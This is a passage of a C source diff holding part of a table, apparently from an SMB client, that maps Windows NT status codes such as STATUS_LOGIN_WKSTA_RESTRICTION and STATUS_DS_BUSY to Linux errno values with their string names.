++	"STATUS_LOGIN_TIME_RESTRICTION"},
++	{STATUS_LOGIN_WKSTA_RESTRICTION, -EACCES,
++	"STATUS_LOGIN_WKSTA_RESTRICTION"},
++	{STATUS_IMAGE_MP_UP_MISMATCH, -EIO, "STATUS_IMAGE_MP_UP_MISMATCH"},
++	{STATUS_INSUFFICIENT_LOGON_INFO, -EIO,
++	"STATUS_INSUFFICIENT_LOGON_INFO"},
++	{STATUS_BAD_DLL_ENTRYPOINT, -EIO, "STATUS_BAD_DLL_ENTRYPOINT"},
++	{STATUS_BAD_SERVICE_ENTRYPOINT, -EIO, "STATUS_BAD_SERVICE_ENTRYPOINT"},
++	{STATUS_LPC_REPLY_LOST, -EIO, "STATUS_LPC_REPLY_LOST"},
++	{STATUS_IP_ADDRESS_CONFLICT1, -EIO, "STATUS_IP_ADDRESS_CONFLICT1"},
++	{STATUS_IP_ADDRESS_CONFLICT2, -EIO, "STATUS_IP_ADDRESS_CONFLICT2"},
++	{STATUS_REGISTRY_QUOTA_LIMIT, -EDQUOT, "STATUS_REGISTRY_QUOTA_LIMIT"},
++	{STATUS_PATH_NOT_COVERED, -EREMOTE, "STATUS_PATH_NOT_COVERED"},
++	{STATUS_NO_CALLBACK_ACTIVE, -EIO, "STATUS_NO_CALLBACK_ACTIVE"},
++	{STATUS_LICENSE_QUOTA_EXCEEDED, -EACCES,
++	"STATUS_LICENSE_QUOTA_EXCEEDED"},
++	{STATUS_PWD_TOO_SHORT, -EIO, "STATUS_PWD_TOO_SHORT"},
++	{STATUS_PWD_TOO_RECENT, -EIO, "STATUS_PWD_TOO_RECENT"},
++	{STATUS_PWD_HISTORY_CONFLICT, -EIO, "STATUS_PWD_HISTORY_CONFLICT"},
++	{STATUS_PLUGPLAY_NO_DEVICE, -EIO, "STATUS_PLUGPLAY_NO_DEVICE"},
++	{STATUS_UNSUPPORTED_COMPRESSION, -EIO,
++	"STATUS_UNSUPPORTED_COMPRESSION"},
++	{STATUS_INVALID_HW_PROFILE, -EIO, "STATUS_INVALID_HW_PROFILE"},
++	{STATUS_INVALID_PLUGPLAY_DEVICE_PATH, -EIO,
++	"STATUS_INVALID_PLUGPLAY_DEVICE_PATH"},
++	{STATUS_DRIVER_ORDINAL_NOT_FOUND, -EIO,
++	"STATUS_DRIVER_ORDINAL_NOT_FOUND"},
++	{STATUS_DRIVER_ENTRYPOINT_NOT_FOUND, -EIO,
++	"STATUS_DRIVER_ENTRYPOINT_NOT_FOUND"},
++	{STATUS_RESOURCE_NOT_OWNED, -EIO, "STATUS_RESOURCE_NOT_OWNED"},
++	{STATUS_TOO_MANY_LINKS, -EMLINK, "STATUS_TOO_MANY_LINKS"},
++	{STATUS_QUOTA_LIST_INCONSISTENT, -EIO,
++	"STATUS_QUOTA_LIST_INCONSISTENT"},
++	{STATUS_FILE_IS_OFFLINE, -EIO, "STATUS_FILE_IS_OFFLINE"},
++	{STATUS_EVALUATION_EXPIRATION, -EIO, "STATUS_EVALUATION_EXPIRATION"},
++	{STATUS_ILLEGAL_DLL_RELOCATION, -EIO, "STATUS_ILLEGAL_DLL_RELOCATION"},
++	{STATUS_LICENSE_VIOLATION, -EIO, "STATUS_LICENSE_VIOLATION"},
++	{STATUS_DLL_INIT_FAILED_LOGOFF, -EIO, "STATUS_DLL_INIT_FAILED_LOGOFF"},
++	{STATUS_DRIVER_UNABLE_TO_LOAD, -EIO, "STATUS_DRIVER_UNABLE_TO_LOAD"},
++	{STATUS_DFS_UNAVAILABLE, -EIO, "STATUS_DFS_UNAVAILABLE"},
++	{STATUS_VOLUME_DISMOUNTED, -EIO, "STATUS_VOLUME_DISMOUNTED"},
++	{STATUS_WX86_INTERNAL_ERROR, -EIO, "STATUS_WX86_INTERNAL_ERROR"},
++	{STATUS_WX86_FLOAT_STACK_CHECK, -EIO, "STATUS_WX86_FLOAT_STACK_CHECK"},
++	{STATUS_VALIDATE_CONTINUE, -EIO, "STATUS_VALIDATE_CONTINUE"},
++	{STATUS_NO_MATCH, -EIO, "STATUS_NO_MATCH"},
++	{STATUS_NO_MORE_MATCHES, -EIO, "STATUS_NO_MORE_MATCHES"},
++	{STATUS_NOT_A_REPARSE_POINT, -EIO, "STATUS_NOT_A_REPARSE_POINT"},
++	{STATUS_IO_REPARSE_TAG_INVALID, -EIO, "STATUS_IO_REPARSE_TAG_INVALID"},
++	{STATUS_IO_REPARSE_TAG_MISMATCH, -EIO,
++	"STATUS_IO_REPARSE_TAG_MISMATCH"},
++	{STATUS_IO_REPARSE_DATA_INVALID, -EIO,
++	"STATUS_IO_REPARSE_DATA_INVALID"},
++	{STATUS_IO_REPARSE_TAG_NOT_HANDLED, -EIO,
++	"STATUS_IO_REPARSE_TAG_NOT_HANDLED"},
++	{STATUS_REPARSE_POINT_NOT_RESOLVED, -EIO,
++	"STATUS_REPARSE_POINT_NOT_RESOLVED"},
++	{STATUS_DIRECTORY_IS_A_REPARSE_POINT, -EIO,
++	"STATUS_DIRECTORY_IS_A_REPARSE_POINT"},
++	{STATUS_RANGE_LIST_CONFLICT, -EIO, "STATUS_RANGE_LIST_CONFLICT"},
++	{STATUS_SOURCE_ELEMENT_EMPTY, -EIO, "STATUS_SOURCE_ELEMENT_EMPTY"},
++	{STATUS_DESTINATION_ELEMENT_FULL, -EIO,
++	"STATUS_DESTINATION_ELEMENT_FULL"},
++	{STATUS_ILLEGAL_ELEMENT_ADDRESS, -EIO,
++	"STATUS_ILLEGAL_ELEMENT_ADDRESS"},
++	{STATUS_MAGAZINE_NOT_PRESENT, -EIO, "STATUS_MAGAZINE_NOT_PRESENT"},
++	{STATUS_REINITIALIZATION_NEEDED, -EIO,
++	"STATUS_REINITIALIZATION_NEEDED"},
++	{STATUS_ENCRYPTION_FAILED, -EIO, "STATUS_ENCRYPTION_FAILED"},
++	{STATUS_DECRYPTION_FAILED, -EIO, "STATUS_DECRYPTION_FAILED"},
++	{STATUS_RANGE_NOT_FOUND, -EIO, "STATUS_RANGE_NOT_FOUND"},
++	{STATUS_NO_RECOVERY_POLICY, -EIO, "STATUS_NO_RECOVERY_POLICY"},
++	{STATUS_NO_EFS, -EIO, "STATUS_NO_EFS"},
++	{STATUS_WRONG_EFS, -EIO, "STATUS_WRONG_EFS"},
++	{STATUS_NO_USER_KEYS, -EIO, "STATUS_NO_USER_KEYS"},
++	{STATUS_FILE_NOT_ENCRYPTED, -EIO, "STATUS_FILE_NOT_ENCRYPTED"},
++	{STATUS_NOT_EXPORT_FORMAT, -EIO, "STATUS_NOT_EXPORT_FORMAT"},
++	{STATUS_FILE_ENCRYPTED, -EIO, "STATUS_FILE_ENCRYPTED"},
++	{STATUS_WMI_GUID_NOT_FOUND, -EIO, "STATUS_WMI_GUID_NOT_FOUND"},
++	{STATUS_WMI_INSTANCE_NOT_FOUND, -EIO, "STATUS_WMI_INSTANCE_NOT_FOUND"},
++	{STATUS_WMI_ITEMID_NOT_FOUND, -EIO, "STATUS_WMI_ITEMID_NOT_FOUND"},
++	{STATUS_WMI_TRY_AGAIN, -EIO, "STATUS_WMI_TRY_AGAIN"},
++	{STATUS_SHARED_POLICY, -EIO, "STATUS_SHARED_POLICY"},
++	{STATUS_POLICY_OBJECT_NOT_FOUND, -EIO,
++	"STATUS_POLICY_OBJECT_NOT_FOUND"},
++	{STATUS_POLICY_ONLY_IN_DS, -EIO, "STATUS_POLICY_ONLY_IN_DS"},
++	{STATUS_VOLUME_NOT_UPGRADED, -EIO, "STATUS_VOLUME_NOT_UPGRADED"},
++	{STATUS_REMOTE_STORAGE_NOT_ACTIVE, -EIO,
++	"STATUS_REMOTE_STORAGE_NOT_ACTIVE"},
++	{STATUS_REMOTE_STORAGE_MEDIA_ERROR, -EIO,
++	"STATUS_REMOTE_STORAGE_MEDIA_ERROR"},
++	{STATUS_NO_TRACKING_SERVICE, -EIO, "STATUS_NO_TRACKING_SERVICE"},
++	{STATUS_SERVER_SID_MISMATCH, -EIO, "STATUS_SERVER_SID_MISMATCH"},
++	{STATUS_DS_NO_ATTRIBUTE_OR_VALUE, -EIO,
++	"STATUS_DS_NO_ATTRIBUTE_OR_VALUE"},
++	{STATUS_DS_INVALID_ATTRIBUTE_SYNTAX, -EIO,
++	"STATUS_DS_INVALID_ATTRIBUTE_SYNTAX"},
++	{STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED, -EIO,
++	"STATUS_DS_ATTRIBUTE_TYPE_UNDEFINED"},
++	{STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS, -EIO,
++	"STATUS_DS_ATTRIBUTE_OR_VALUE_EXISTS"},
++	{STATUS_DS_BUSY, -EBUSY, "STATUS_DS_BUSY"},
++	{STATUS_DS_UNAVAILABLE, -EIO, "STATUS_DS_UNAVAILABLE"},
++	{STATUS_DS_NO_RIDS_ALLOCATED, -EIO, "STATUS_DS_NO_RIDS_ALLOCATED"},
++	{STATUS_DS_NO_MORE_RIDS, -EIO, "STATUS_DS_NO_MORE_RIDS"},
++	{STATUS_DS_INCORRECT_ROLE_OWNER, -EIO,
++	"STATUS_DS_INCORRECT_ROLE_OWNER"},
++	{STATUS_DS_RIDMGR_INIT_ERROR, -EIO, "STATUS_DS_RIDMGR_INIT_ERROR"},
++	{STATUS_DS_OBJ_CLASS_VIOLATION, -EIO, "STATUS_DS_OBJ_CLASS_VIOLATION"},
++	{STATUS_DS_CANT_ON_NON_LEAF, -EIO, "STATUS_DS_CANT_ON_NON_LEAF"},
++	{STATUS_DS_CANT_ON_RDN, -EIO, "STATUS_DS_CANT_ON_RDN"},
++	{STATUS_DS_CANT_MOD_OBJ_CLASS, -EIO, "STATUS_DS_CANT_MOD_OBJ_CLASS"},
++	{STATUS_DS_CROSS_DOM_MOVE_FAILED, -EIO,
++	"STATUS_DS_CROSS_DOM_MOVE_FAILED"},
++	{STATUS_DS_GC_NOT_AVAILABLE, -EIO, "STATUS_DS_GC_NOT_AVAILABLE"},
++	{STATUS_DIRECTORY_SERVICE_REQUIRED, -EIO,
++	"STATUS_DIRECTORY_SERVICE_REQUIRED"},
++	{STATUS_REPARSE_ATTRIBUTE_CONFLICT, -EIO,
++	"STATUS_REPARSE_ATTRIBUTE_CONFLICT"},
++	{STATUS_CANT_ENABLE_DENY_ONLY, -EIO, "STATUS_CANT_ENABLE_DENY_ONLY"},
++	{STATUS_FLOAT_MULTIPLE_FAULTS, -EIO, "STATUS_FLOAT_MULTIPLE_FAULTS"},
++	{STATUS_FLOAT_MULTIPLE_TRAPS, -EIO, "STATUS_FLOAT_MULTIPLE_TRAPS"},
++	{STATUS_DEVICE_REMOVED, -EIO, "STATUS_DEVICE_REMOVED"},
++	{STATUS_JOURNAL_DELETE_IN_PROGRESS, -EIO,
++	"STATUS_JOURNAL_DELETE_IN_PROGRESS"},
++	{STATUS_JOURNAL_NOT_ACTIVE, -EIO, "STATUS_JOURNAL_NOT_ACTIVE"},
++	{STATUS_NOINTERFACE, -EIO, "STATUS_NOINTERFACE"},
++	{STATUS_DS_ADMIN_LIMIT_EXCEEDED, -EIO,
++	"STATUS_DS_ADMIN_LIMIT_EXCEEDED"},
++	{STATUS_DRIVER_FAILED_SLEEP, -EIO, "STATUS_DRIVER_FAILED_SLEEP"},
++	{STATUS_MUTUAL_AUTHENTICATION_FAILED, -EIO,
++	"STATUS_MUTUAL_AUTHENTICATION_FAILED"},
++	{STATUS_CORRUPT_SYSTEM_FILE, -EIO, "STATUS_CORRUPT_SYSTEM_FILE"},
++	{STATUS_DATATYPE_MISALIGNMENT_ERROR, -EIO,
++	"STATUS_DATATYPE_MISALIGNMENT_ERROR"},
++	{STATUS_WMI_READ_ONLY, -EROFS, "STATUS_WMI_READ_ONLY"},
++	{STATUS_WMI_SET_FAILURE, -EIO, "STATUS_WMI_SET_FAILURE"},
++	{STATUS_COMMITMENT_MINIMUM, -EIO, "STATUS_COMMITMENT_MINIMUM"},
++	{STATUS_REG_NAT_CONSUMPTION, -EIO, "STATUS_REG_NAT_CONSUMPTION"},
++	{STATUS_TRANSPORT_FULL, -EIO, "STATUS_TRANSPORT_FULL"},
++	{STATUS_DS_SAM_INIT_FAILURE, -EIO, "STATUS_DS_SAM_INIT_FAILURE"},
++	{STATUS_ONLY_IF_CONNECTED, -EIO, "STATUS_ONLY_IF_CONNECTED"},
++	{STATUS_DS_SENSITIVE_GROUP_VIOLATION, -EIO,
++	"STATUS_DS_SENSITIVE_GROUP_VIOLATION"},
++	{STATUS_PNP_RESTART_ENUMERATION, -EIO,
++	"STATUS_PNP_RESTART_ENUMERATION"},
++	{STATUS_JOURNAL_ENTRY_DELETED, -EIO, "STATUS_JOURNAL_ENTRY_DELETED"},
++	{STATUS_DS_CANT_MOD_PRIMARYGROUPID, -EIO,
++	"STATUS_DS_CANT_MOD_PRIMARYGROUPID"},
++	{STATUS_SYSTEM_IMAGE_BAD_SIGNATURE, -EIO,
++	"STATUS_SYSTEM_IMAGE_BAD_SIGNATURE"},
++	{STATUS_PNP_REBOOT_REQUIRED, -EIO, "STATUS_PNP_REBOOT_REQUIRED"},
++	{STATUS_POWER_STATE_INVALID, -EIO, "STATUS_POWER_STATE_INVALID"},
++	{STATUS_DS_INVALID_GROUP_TYPE, -EIO, "STATUS_DS_INVALID_GROUP_TYPE"},
++	{STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN, -EIO,
++	"STATUS_DS_NO_NEST_GLOBALGROUP_IN_MIXEDDOMAIN"},
++	{STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN, -EIO,
++	"STATUS_DS_NO_NEST_LOCALGROUP_IN_MIXEDDOMAIN"},
++	{STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
++	"STATUS_DS_GLOBAL_CANT_HAVE_LOCAL_MEMBER"},
++	{STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
++	"STATUS_DS_GLOBAL_CANT_HAVE_UNIVERSAL_MEMBER"},
++	{STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER, -EIO,
++	"STATUS_DS_UNIVERSAL_CANT_HAVE_LOCAL_MEMBER"},
++	{STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER, -EIO,
++	"STATUS_DS_GLOBAL_CANT_HAVE_CROSSDOMAIN_MEMBER"},
++	{STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER, -EIO,
++	"STATUS_DS_LOCAL_CANT_HAVE_CROSSDOMAIN_LOCAL_MEMBER"},
++	{STATUS_DS_HAVE_PRIMARY_MEMBERS, -EIO,
++	"STATUS_DS_HAVE_PRIMARY_MEMBERS"},
++	{STATUS_WMI_NOT_SUPPORTED, -EOPNOTSUPP, "STATUS_WMI_NOT_SUPPORTED"},
++	{STATUS_INSUFFICIENT_POWER, -EIO, "STATUS_INSUFFICIENT_POWER"},
++	{STATUS_SAM_NEED_BOOTKEY_PASSWORD, -EIO,
++	"STATUS_SAM_NEED_BOOTKEY_PASSWORD"},
++	{STATUS_SAM_NEED_BOOTKEY_FLOPPY, -EIO,
++	"STATUS_SAM_NEED_BOOTKEY_FLOPPY"},
++	{STATUS_DS_CANT_START, -EIO, "STATUS_DS_CANT_START"},
++	{STATUS_DS_INIT_FAILURE, -EIO, "STATUS_DS_INIT_FAILURE"},
++	{STATUS_SAM_INIT_FAILURE, -EIO, "STATUS_SAM_INIT_FAILURE"},
++	{STATUS_DS_GC_REQUIRED, -EIO, "STATUS_DS_GC_REQUIRED"},
++	{STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY, -EIO,
++	"STATUS_DS_LOCAL_MEMBER_OF_LOCAL_ONLY"},
++	{STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS, -EIO,
++	"STATUS_DS_NO_FPO_IN_UNIVERSAL_GROUPS"},
++	{STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED"},
++	{STATUS_MULTIPLE_FAULT_VIOLATION, -EIO,
++	"STATUS_MULTIPLE_FAULT_VIOLATION"},
++	{STATUS_CURRENT_DOMAIN_NOT_ALLOWED, -EIO,
++	"STATUS_CURRENT_DOMAIN_NOT_ALLOWED"},
++	{STATUS_CANNOT_MAKE, -EIO, "STATUS_CANNOT_MAKE"},
++	{STATUS_SYSTEM_SHUTDOWN, -EIO, "STATUS_SYSTEM_SHUTDOWN"},
++	{STATUS_DS_INIT_FAILURE_CONSOLE, -EIO,
++	"STATUS_DS_INIT_FAILURE_CONSOLE"},
++	{STATUS_DS_SAM_INIT_FAILURE_CONSOLE, -EIO,
++	"STATUS_DS_SAM_INIT_FAILURE_CONSOLE"},
++	{STATUS_UNFINISHED_CONTEXT_DELETED, -EIO,
++	"STATUS_UNFINISHED_CONTEXT_DELETED"},
++	{STATUS_NO_TGT_REPLY, -EIO, "STATUS_NO_TGT_REPLY"},
++	/* Note that ENOATTTR and ENODATA are the same errno */
++	{STATUS_OBJECTID_NOT_FOUND, -ENODATA, "STATUS_OBJECTID_NOT_FOUND"},
++	{STATUS_NO_IP_ADDRESSES, -EIO, "STATUS_NO_IP_ADDRESSES"},
++	{STATUS_WRONG_CREDENTIAL_HANDLE, -EIO,
++	"STATUS_WRONG_CREDENTIAL_HANDLE"},
++	{STATUS_CRYPTO_SYSTEM_INVALID, -EIO, "STATUS_CRYPTO_SYSTEM_INVALID"},
++	{STATUS_MAX_REFERRALS_EXCEEDED, -EIO, "STATUS_MAX_REFERRALS_EXCEEDED"},
++	{STATUS_MUST_BE_KDC, -EIO, "STATUS_MUST_BE_KDC"},
++	{STATUS_STRONG_CRYPTO_NOT_SUPPORTED, -EIO,
++	"STATUS_STRONG_CRYPTO_NOT_SUPPORTED"},
++	{STATUS_TOO_MANY_PRINCIPALS, -EIO, "STATUS_TOO_MANY_PRINCIPALS"},
++	{STATUS_NO_PA_DATA, -EIO, "STATUS_NO_PA_DATA"},
++	{STATUS_PKINIT_NAME_MISMATCH, -EIO, "STATUS_PKINIT_NAME_MISMATCH"},
++	{STATUS_SMARTCARD_LOGON_REQUIRED, -EIO,
++	"STATUS_SMARTCARD_LOGON_REQUIRED"},
++	{STATUS_KDC_INVALID_REQUEST, -EIO, "STATUS_KDC_INVALID_REQUEST"},
++	{STATUS_KDC_UNABLE_TO_REFER, -EIO, "STATUS_KDC_UNABLE_TO_REFER"},
++	{STATUS_KDC_UNKNOWN_ETYPE, -EIO, "STATUS_KDC_UNKNOWN_ETYPE"},
++	{STATUS_SHUTDOWN_IN_PROGRESS, -EIO, "STATUS_SHUTDOWN_IN_PROGRESS"},
++	{STATUS_SERVER_SHUTDOWN_IN_PROGRESS, -EIO,
++	"STATUS_SERVER_SHUTDOWN_IN_PROGRESS"},
++	{STATUS_NOT_SUPPORTED_ON_SBS, -EOPNOTSUPP,
++	"STATUS_NOT_SUPPORTED_ON_SBS"},
++	{STATUS_WMI_GUID_DISCONNECTED, -EIO, "STATUS_WMI_GUID_DISCONNECTED"},
++	{STATUS_WMI_ALREADY_DISABLED, -EIO, "STATUS_WMI_ALREADY_DISABLED"},
++	{STATUS_WMI_ALREADY_ENABLED, -EIO, "STATUS_WMI_ALREADY_ENABLED"},
++	{STATUS_MFT_TOO_FRAGMENTED, -EIO, "STATUS_MFT_TOO_FRAGMENTED"},
++	{STATUS_COPY_PROTECTION_FAILURE, -EIO,
++	"STATUS_COPY_PROTECTION_FAILURE"},
++	{STATUS_CSS_AUTHENTICATION_FAILURE, -EIO,
++	"STATUS_CSS_AUTHENTICATION_FAILURE"},
++	{STATUS_CSS_KEY_NOT_PRESENT, -EIO, "STATUS_CSS_KEY_NOT_PRESENT"},
++	{STATUS_CSS_KEY_NOT_ESTABLISHED, -EIO,
++	"STATUS_CSS_KEY_NOT_ESTABLISHED"},
++	{STATUS_CSS_SCRAMBLED_SECTOR, -EIO, "STATUS_CSS_SCRAMBLED_SECTOR"},
++	{STATUS_CSS_REGION_MISMATCH, -EIO, "STATUS_CSS_REGION_MISMATCH"},
++	{STATUS_CSS_RESETS_EXHAUSTED, -EIO, "STATUS_CSS_RESETS_EXHAUSTED"},
++	{STATUS_PKINIT_FAILURE, -EIO, "STATUS_PKINIT_FAILURE"},
++	{STATUS_SMARTCARD_SUBSYSTEM_FAILURE, -EIO,
++	"STATUS_SMARTCARD_SUBSYSTEM_FAILURE"},
++	{STATUS_NO_KERB_KEY, -EIO, "STATUS_NO_KERB_KEY"},
++	{STATUS_HOST_DOWN, -EIO, "STATUS_HOST_DOWN"},
++	{STATUS_UNSUPPORTED_PREAUTH, -EIO, "STATUS_UNSUPPORTED_PREAUTH"},
++	{STATUS_EFS_ALG_BLOB_TOO_BIG, -EIO, "STATUS_EFS_ALG_BLOB_TOO_BIG"},
++	{STATUS_PORT_NOT_SET, -EIO, "STATUS_PORT_NOT_SET"},
++	{STATUS_DEBUGGER_INACTIVE, -EIO, "STATUS_DEBUGGER_INACTIVE"},
++	{STATUS_DS_VERSION_CHECK_FAILURE, -EIO,
++	"STATUS_DS_VERSION_CHECK_FAILURE"},
++	{STATUS_AUDITING_DISABLED, -EIO, "STATUS_AUDITING_DISABLED"},
++	{STATUS_PRENT4_MACHINE_ACCOUNT, -EIO, "STATUS_PRENT4_MACHINE_ACCOUNT"},
++	{STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER, -EIO,
++	"STATUS_DS_AG_CANT_HAVE_UNIVERSAL_MEMBER"},
++	{STATUS_INVALID_IMAGE_WIN_32, -EIO, "STATUS_INVALID_IMAGE_WIN_32"},
++	{STATUS_INVALID_IMAGE_WIN_64, -EIO, "STATUS_INVALID_IMAGE_WIN_64"},
++	{STATUS_BAD_BINDINGS, -EIO, "STATUS_BAD_BINDINGS"},
++	{STATUS_NETWORK_SESSION_EXPIRED, -EIO,
++	"STATUS_NETWORK_SESSION_EXPIRED"},
++	{STATUS_APPHELP_BLOCK, -EIO, "STATUS_APPHELP_BLOCK"},
++	{STATUS_ALL_SIDS_FILTERED, -EIO, "STATUS_ALL_SIDS_FILTERED"},
++	{STATUS_NOT_SAFE_MODE_DRIVER, -EIO, "STATUS_NOT_SAFE_MODE_DRIVER"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_DEFAULT"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_PATH, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_PATH"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_PUBLISHER"},
++	{STATUS_ACCESS_DISABLED_BY_POLICY_OTHER, -EACCES,
++	"STATUS_ACCESS_DISABLED_BY_POLICY_OTHER"},
++	{STATUS_FAILED_DRIVER_ENTRY, -EIO, "STATUS_FAILED_DRIVER_ENTRY"},
++	{STATUS_DEVICE_ENUMERATION_ERROR, -EIO,
++	"STATUS_DEVICE_ENUMERATION_ERROR"},
++	{STATUS_MOUNT_POINT_NOT_RESOLVED, -EIO,
++	"STATUS_MOUNT_POINT_NOT_RESOLVED"},
++	{STATUS_INVALID_DEVICE_OBJECT_PARAMETER, -EIO,
++	"STATUS_INVALID_DEVICE_OBJECT_PARAMETER"},
++	{STATUS_MCA_OCCURED, -EIO, "STATUS_MCA_OCCURED"},
++	{STATUS_DRIVER_BLOCKED_CRITICAL, -EIO,
++	"STATUS_DRIVER_BLOCKED_CRITICAL"},
++	{STATUS_DRIVER_BLOCKED, -EIO, "STATUS_DRIVER_BLOCKED"},
++	{STATUS_DRIVER_DATABASE_ERROR, -EIO, "STATUS_DRIVER_DATABASE_ERROR"},
++	{STATUS_SYSTEM_HIVE_TOO_LARGE, -EIO, "STATUS_SYSTEM_HIVE_TOO_LARGE"},
++	{STATUS_INVALID_IMPORT_OF_NON_DLL, -EIO,
++	"STATUS_INVALID_IMPORT_OF_NON_DLL"},
++	{STATUS_NO_SECRETS, -EIO, "STATUS_NO_SECRETS"},
++	{STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY, -EACCES,
++	"STATUS_ACCESS_DISABLED_NO_SAFER_UI_BY_POLICY"},
++	{STATUS_FAILED_STACK_SWITCH, -EIO, "STATUS_FAILED_STACK_SWITCH"},
++	{STATUS_HEAP_CORRUPTION, -EIO, "STATUS_HEAP_CORRUPTION"},
++	{STATUS_SMARTCARD_WRONG_PIN, -EIO, "STATUS_SMARTCARD_WRONG_PIN"},
++	{STATUS_SMARTCARD_CARD_BLOCKED, -EIO, "STATUS_SMARTCARD_CARD_BLOCKED"},
++	{STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED, -EIO,
++	"STATUS_SMARTCARD_CARD_NOT_AUTHENTICATED"},
++	{STATUS_SMARTCARD_NO_CARD, -EIO, "STATUS_SMARTCARD_NO_CARD"},
++	{STATUS_SMARTCARD_NO_KEY_CONTAINER, -EIO,
++	"STATUS_SMARTCARD_NO_KEY_CONTAINER"},
++	{STATUS_SMARTCARD_NO_CERTIFICATE, -EIO,
++	"STATUS_SMARTCARD_NO_CERTIFICATE"},
++	{STATUS_SMARTCARD_NO_KEYSET, -EIO, "STATUS_SMARTCARD_NO_KEYSET"},
++	{STATUS_SMARTCARD_IO_ERROR, -EIO, "STATUS_SMARTCARD_IO_ERROR"},
++	{STATUS_DOWNGRADE_DETECTED, -EIO, "STATUS_DOWNGRADE_DETECTED"},
++	{STATUS_SMARTCARD_CERT_REVOKED, -EIO, "STATUS_SMARTCARD_CERT_REVOKED"},
++	{STATUS_ISSUING_CA_UNTRUSTED, -EIO, "STATUS_ISSUING_CA_UNTRUSTED"},
++	{STATUS_REVOCATION_OFFLINE_C, -EIO, "STATUS_REVOCATION_OFFLINE_C"},
++	{STATUS_PKINIT_CLIENT_FAILURE, -EIO, "STATUS_PKINIT_CLIENT_FAILURE"},
++	{STATUS_SMARTCARD_CERT_EXPIRED, -EIO, "STATUS_SMARTCARD_CERT_EXPIRED"},
++	{STATUS_DRIVER_FAILED_PRIOR_UNLOAD, -EIO,
++	"STATUS_DRIVER_FAILED_PRIOR_UNLOAD"},
++	{STATUS_SMARTCARD_SILENT_CONTEXT, -EIO,
++	"STATUS_SMARTCARD_SILENT_CONTEXT"},
++	{STATUS_PER_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_PER_USER_TRUST_QUOTA_EXCEEDED"},
++	{STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_ALL_USER_TRUST_QUOTA_EXCEEDED"},
++	{STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_USER_DELETE_TRUST_QUOTA_EXCEEDED"},
++	{STATUS_DS_NAME_NOT_UNIQUE, -EIO, "STATUS_DS_NAME_NOT_UNIQUE"},
++	{STATUS_DS_DUPLICATE_ID_FOUND, -EIO, "STATUS_DS_DUPLICATE_ID_FOUND"},
++	{STATUS_DS_GROUP_CONVERSION_ERROR, -EIO,
++	"STATUS_DS_GROUP_CONVERSION_ERROR"},
++	{STATUS_VOLSNAP_PREPARE_HIBERNATE, -EIO,
++	"STATUS_VOLSNAP_PREPARE_HIBERNATE"},
++	{STATUS_USER2USER_REQUIRED, -EIO, "STATUS_USER2USER_REQUIRED"},
++	{STATUS_STACK_BUFFER_OVERRUN, -EIO, "STATUS_STACK_BUFFER_OVERRUN"},
++	{STATUS_NO_S4U_PROT_SUPPORT, -EIO, "STATUS_NO_S4U_PROT_SUPPORT"},
++	{STATUS_CROSSREALM_DELEGATION_FAILURE, -EIO,
++	"STATUS_CROSSREALM_DELEGATION_FAILURE"},
++	{STATUS_REVOCATION_OFFLINE_KDC, -EIO, "STATUS_REVOCATION_OFFLINE_KDC"},
++	{STATUS_ISSUING_CA_UNTRUSTED_KDC, -EIO,
++	"STATUS_ISSUING_CA_UNTRUSTED_KDC"},
++	{STATUS_KDC_CERT_EXPIRED, -EIO, "STATUS_KDC_CERT_EXPIRED"},
++	{STATUS_KDC_CERT_REVOKED, -EIO, "STATUS_KDC_CERT_REVOKED"},
++	{STATUS_PARAMETER_QUOTA_EXCEEDED, -EDQUOT,
++	"STATUS_PARAMETER_QUOTA_EXCEEDED"},
++	{STATUS_HIBERNATION_FAILURE, -EIO, "STATUS_HIBERNATION_FAILURE"},
++	{STATUS_DELAY_LOAD_FAILED, -EIO, "STATUS_DELAY_LOAD_FAILED"},
++	{STATUS_AUTHENTICATION_FIREWALL_FAILED, -EIO,
++	"STATUS_AUTHENTICATION_FIREWALL_FAILED"},
++	{STATUS_VDM_DISALLOWED, -EIO, "STATUS_VDM_DISALLOWED"},
++	{STATUS_HUNG_DISPLAY_DRIVER_THREAD, -EIO,
++	"STATUS_HUNG_DISPLAY_DRIVER_THREAD"},
++	{STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE, -EIO,
++	"STATUS_INSUFFICIENT_RESOURCE_FOR_SPECIFIED_SHARED_SECTION_SIZE"},
++	{STATUS_INVALID_CRUNTIME_PARAMETER, -EIO,
++	"STATUS_INVALID_CRUNTIME_PARAMETER"},
++	{STATUS_NTLM_BLOCKED, -EIO, "STATUS_NTLM_BLOCKED"},
++	{STATUS_ASSERTION_FAILURE, -EIO, "STATUS_ASSERTION_FAILURE"},
++	{STATUS_VERIFIER_STOP, -EIO, "STATUS_VERIFIER_STOP"},
++	{STATUS_CALLBACK_POP_STACK, -EIO, "STATUS_CALLBACK_POP_STACK"},
++	{STATUS_INCOMPATIBLE_DRIVER_BLOCKED, -EIO,
